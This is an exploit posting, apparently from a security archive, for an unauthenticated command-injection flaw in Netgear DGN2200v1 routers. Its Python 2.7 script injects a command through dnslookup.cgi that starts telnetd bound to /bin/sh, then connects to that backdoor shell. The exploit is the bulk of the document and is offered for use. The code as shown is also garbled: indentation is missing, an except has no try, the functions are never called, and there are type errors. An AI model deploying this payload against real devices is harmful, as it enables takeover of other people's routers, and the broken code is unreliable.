Netgear DGN2200v1 Remote Command Execution

Netgear DGN2200v1 unauthenticated remote command execution exploit.

MD5 | 96115dcdd234c64faf52433480e0ca59

# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 02.07.2021
# Exploit Author: SivertPL
# Vendor Homepage:
# Version: All prior to v1.0.0.60


NETGEAR DGN2200v1 Unauthenticated Remote Command Execution

Author: SivertPL ([email protected])
Date: 02.07.2021
Status: Patched in some models
Version: All prior to v1.0.0.60
Impact: Critical

CVE: No CVE number assigned
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365


The exploit script only works on UNIX-based systems.

This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.


import sys
import requests
import os

target_ip = ""
telnet_port = 666
sent = False

def main():
if len(sys.argv) < 3:
print "./ <router ip> <backdoor-port>"

target_ip = sys.argv[1]
telnet_port = int(sys.argv[2])
print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
print "[!] If it fails to connect it means the target is probably not vulnerable"

def send_payload():
requests.get("http://" + target_ip + "/dnslookup.cgi?; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
sent = True
except Exception:
sent = False
print "[-] Unknown error, target might not be vulnerable."

def spawn_shell():
if sent:
print "[+] Dropping a shell..."
os.system("telnet " + target_ip + " " + telnet_port)

if __name__ == "__main__":

Related Posts